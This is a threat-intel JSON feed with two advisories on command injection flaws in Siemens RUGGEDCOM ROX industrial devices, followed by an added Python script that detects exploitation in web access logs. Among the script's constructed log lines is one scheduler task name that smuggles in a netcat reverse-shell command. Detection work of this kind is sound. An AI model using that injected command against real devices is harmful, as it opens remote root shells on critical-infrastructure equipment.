{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/ruggedcom-rox-mx5000/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2025-40947"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["RUGGEDCOM ROX MX5000","RUGGEDCOM ROX MX5000RE","RUGGEDCOM ROX RX1400","RUGGEDCOM ROX RX1500","RUGGEDCOM ROX RX1501","RUGGEDCOM ROX RX1510","RUGGEDCOM ROX RX1511","RUGGEDCOM ROX RX1512","RUGGEDCOM ROX RX1524","RUGGEDCOM ROX RX1536","RUGGEDCOM ROX RX5000"],"_cs_severities":["high"],"_cs_tags":["cve","rce","siemens","ruggedcom","ics"],"_cs_type":"threat","_cs_vendors":["Siemens"],"content_html":"\u003cp\u003eA remote code execution vulnerability, tracked as CVE-2025-40947, affects multiple RUGGEDCOM ROX devices. The affected devices include RUGGEDCOM ROX MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000, specifically all versions prior to V2.17.1. The vulnerability stems from a failure to properly sanitize user-supplied input during the feature key installation process. An authenticated attacker can exploit this flaw to inject arbitrary commands, leading to remote code execution with root privileges on the underlying operating system. 
This vulnerability poses a significant risk to industrial control systems relying on these devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the RUGGEDCOM ROX device\u0026rsquo;s management interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious feature key containing embedded operating system commands.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the crafted feature key to the device through the management interface.\u003c/li\u003e\n\u003cli\u003eThe RUGGEDCOM ROX device attempts to install the feature key without proper input sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected commands within the feature key are executed with root privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device\u0026rsquo;s underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then establish persistence by modifying system files.\u003c/li\u003e\n\u003cli\u003eThe attacker can pivot to other internal assets, disrupt operations, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-40947 allows an attacker to execute arbitrary code with root privileges on vulnerable RUGGEDCOM ROX devices. This could lead to complete system compromise, denial of service, disruption of critical infrastructure, and potential lateral movement to other systems within the network. 
The affected devices are deployed in industrial control systems, so exploitation could impact sectors such as energy, transportation, and manufacturing.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all affected RUGGEDCOM ROX devices (MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000) to version V2.17.1 or later to patch CVE-2025-40947.\u003c/li\u003e\n\u003cli\u003eBecause exploitation requires an authenticated session, restrict access to the management interface to a dedicated management network and review which accounts are permitted to install feature keys.\u003c/li\u003e\n\u003cli\u003eMonitor device and web server logs for feature key installations, especially from unexpected accounts or source addresses, to detect potential exploitation attempts; management traffic is normally encrypted, so log-based detection is more reliable than inspecting network traffic. Deploy the Sigma rule \u003ccode\u003eDetect Suspicious Feature Key Uploads\u003c/code\u003e to identify such activity.\u003c/li\u003e\n\u003cli\u003eReview device logs for unusual processes or commands executed on the RUGGEDCOM ROX devices that may indicate successful exploitation. Use the Sigma rule \u003ccode\u003eDetect Malicious Command Execution via Feature Key Injection\u003c/code\u003e for this purpose.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T10:19:32Z","date_published":"2026-05-12T10:19:32Z","id":"https://feed.craftedsignal.io/briefs/2026-05-siemens-rce/","summary":"CVE-2025-40947 describes a vulnerability in Siemens RUGGEDCOM ROX devices that allows authenticated remote attackers to inject arbitrary commands via a maliciously crafted feature key, resulting in remote code execution with root privileges.","title":"Siemens RUGGEDCOM ROX Devices Vulnerable to Remote Code Execution via Feature Key Injection (CVE-2025-40947)","url":"https://feed.craftedsignal.io/briefs/2026-05-siemens-rce/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2025-40949"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["RUGGEDCOM ROX MX5000","RUGGEDCOM ROX MX5000RE","RUGGEDCOM ROX RX1400","RUGGEDCOM ROX RX1500","RUGGEDCOM ROX RX1501","RUGGEDCOM ROX RX1510","RUGGEDCOM ROX RX1511","RUGGEDCOM ROX RX1512","RUGGEDCOM ROX 
RX1524","RUGGEDCOM ROX RX1536","RUGGEDCOM ROX RX5000"],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","ruggedcom"],"_cs_type":"advisory","_cs_vendors":["Siemens"],"content_html":"\u003cp\u003eA critical command injection vulnerability, identified as CVE-2025-40949, affects multiple RUGGEDCOM ROX devices. Specifically, the vulnerability resides in the Scheduler functionality of the Web UI. Versions prior to V2.17.1 of the RUGGEDCOM ROX MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000 are affected. The root cause of this vulnerability is the insufficient sanitization of user-supplied input, which allows an authenticated attacker to inject arbitrary commands into the task scheduling backend. Successful exploitation allows a remote attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device. This poses a significant risk to industrial control systems (ICS) environments where these devices are commonly deployed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the RUGGEDCOM ROX Web UI.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the Scheduler functionality within the Web UI.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious commands into a user-supplied input field (e.g., task name, command to execute, schedule).\u003c/li\u003e\n\u003cli\u003eThe injected commands are not properly sanitized by the application.\u003c/li\u003e\n\u003cli\u003eWhen the scheduler processes the task, the injected commands are executed by the underlying operating system with root privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution, potentially allowing them to install malware, modify configurations, or disrupt operations.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial access to pivot to other 
network resources or maintain persistence on the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-40949 allows an authenticated remote attacker to execute arbitrary commands with root privileges on the RUGGEDCOM ROX device. This could lead to complete system compromise, allowing the attacker to disrupt critical infrastructure operations, steal sensitive data, or use the compromised device as a pivot point to attack other systems within the network. Given the widespread use of RUGGEDCOM devices in industrial control systems, the potential impact is significant and could affect various sectors, including energy, transportation, and manufacturing.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all affected RUGGEDCOM ROX devices to version V2.17.1 or later to patch CVE-2025-40949.\u003c/li\u003e\n\u003cli\u003eBecause exploitation requires an authenticated Web UI session, restrict Web UI access to a dedicated management network and review which accounts can create scheduler tasks.\u003c/li\u003e\n\u003cli\u003eMonitor the device web server logs for requests to the Scheduler functionality of the Web UI, in particular task definitions that contain shell metacharacters such as \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u003c/code\u003e or \u003ccode\u003e$(\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eReview the scheduled tasks configured on each device: a malicious task persists in the configuration and runs again on schedule until it is removed.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules that accompany this brief to detect potential exploitation attempts targeting CVE-2025-40949.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T10:17:37Z","date_published":"2026-05-12T10:17:37Z","id":"https://feed.craftedsignal.io/briefs/2026-05-cve-2025-40949-ruggedcom-rce/","summary":"An authenticated remote command injection vulnerability exists in the web UI scheduler functionality of multiple RUGGEDCOM ROX devices before V2.17.1, allowing arbitrary command execution with root privileges.","title":"CVE-2025-40949 - Siemens RUGGEDCOM ROX Web UI Command Injection","url":"https://feed.craftedsignal.io/briefs/2026-05-cve-2025-40949-ruggedcom-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — RUGGEDCOM ROX MX5000","version":"https://jsonfeed.org/version/1.1"}
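A detection example for the two briefs above, added by the editor and not part of the CraftedSignal feed, Siemens' code or the Sigma rules the briefs reference: it parses constructed access-log lines and flags requests to the scheduler and feature-key handlers whose parameters contain shell metacharacters, the pattern both CVE-2025-40947 and CVE-2025-40949 rely on. The endpoint paths (`/scheduler`, `/featurekey`), the parameter names and every log line are assumptions; the briefs do not name the real ROX URLs.

```python
"""Added example (not CraftedSignal's Sigma rules, not Siemens code): flag
web requests to the scheduler and feature-key handlers described in the two
briefs when a request parameter carries shell metacharacters.

ASSUMPTIONS: the endpoint paths, parameter names and every log line below are
constructed for illustration; the briefs do not give the real ROX URLs.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Hypothetical path prefixes standing in for the ROX Web UI handlers.
WATCHED_PATHS = {
    "/scheduler": "CVE-2025-40949 scheduler command injection",
    "/featurekey": "CVE-2025-40947 feature-key command injection",
}

# Characters that let a value escape a shell command built by concatenation.
META = re.compile(r"[;&|`<>\n\r]|\$[({]")

# Common Log Format: ip ident user [time] "METHOD target HTTP/x" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def parse_clf(line):
    """Parse one access-log line; return None for lines in another format."""
    m = CLF.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = unquote(url.path)
    # parse_qsl percent-decodes values and turns '+' into a space for us.
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def scan_access_log(lines):
    """Return one finding per request that reaches a watched handler and either
    carries shell metacharacters in a query parameter (high confidence) or is a
    POST whose body the access log cannot show (low confidence: the injected
    value travels in the body, so only an application-level log reveals it)."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue  # not an access-log line; skip rather than crash
        label = next((lbl for pfx, lbl in WATCHED_PATHS.items()
                      if rec["path"].startswith(pfx)), None)
        if label is None:
            continue
        hits = [(k, v) for k, v in rec["params"] if META.search(v)]
        if hits:
            findings.append({"confidence": "high", "reason": label,
                             "ip": rec["ip"], "user": rec["user"],
                             "path": rec["path"], "params": hits})
        elif rec["method"] == "POST":
            findings.append({"confidence": "low",
                             "reason": label + " (POST body not in access log)",
                             "ip": rec["ip"], "user": rec["user"],
                             "path": rec["path"], "params": []})
    return findings


# Constructed sample lines: a benign scheduler task, a task name carrying an
# injected reverse shell, a feature-key upload and an unrelated page view.
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/May/2026:10:03:11 +0000] "GET /scheduler/add?name=backup&cmd=/usr/bin/backup.sh&cron=0+2+*+*+* HTTP/1.1" 200 512',
    '10.0.0.9 - admin [12/May/2026:10:04:02 +0000] "GET /scheduler/add?name=x%3B+nc+-e+/bin/sh+10.0.0.9+4444&cron=*+*+*+*+* HTTP/1.1" 200 512',
    '10.0.0.9 - admin [12/May/2026:10:05:40 +0000] "POST /featurekey/install HTTP/1.1" 200 88',
    '10.0.0.5 - admin [12/May/2026:10:06:00 +0000] "GET /status HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["confidence"], f["ip"], f["user"], f["path"], f["reason"], f["params"])
```

Two caveats when adapting this: a legitimate scheduler "command" field may itself contain pipes or redirects, so tune the metacharacter list against a baseline of normal task definitions on the device; and because the injected value in a feature-key upload travels in a POST body, the access log alone only tells you that an upload happened, so the low-confidence findings need to be joined with the device's own audit log or the Sigma rules the briefs reference.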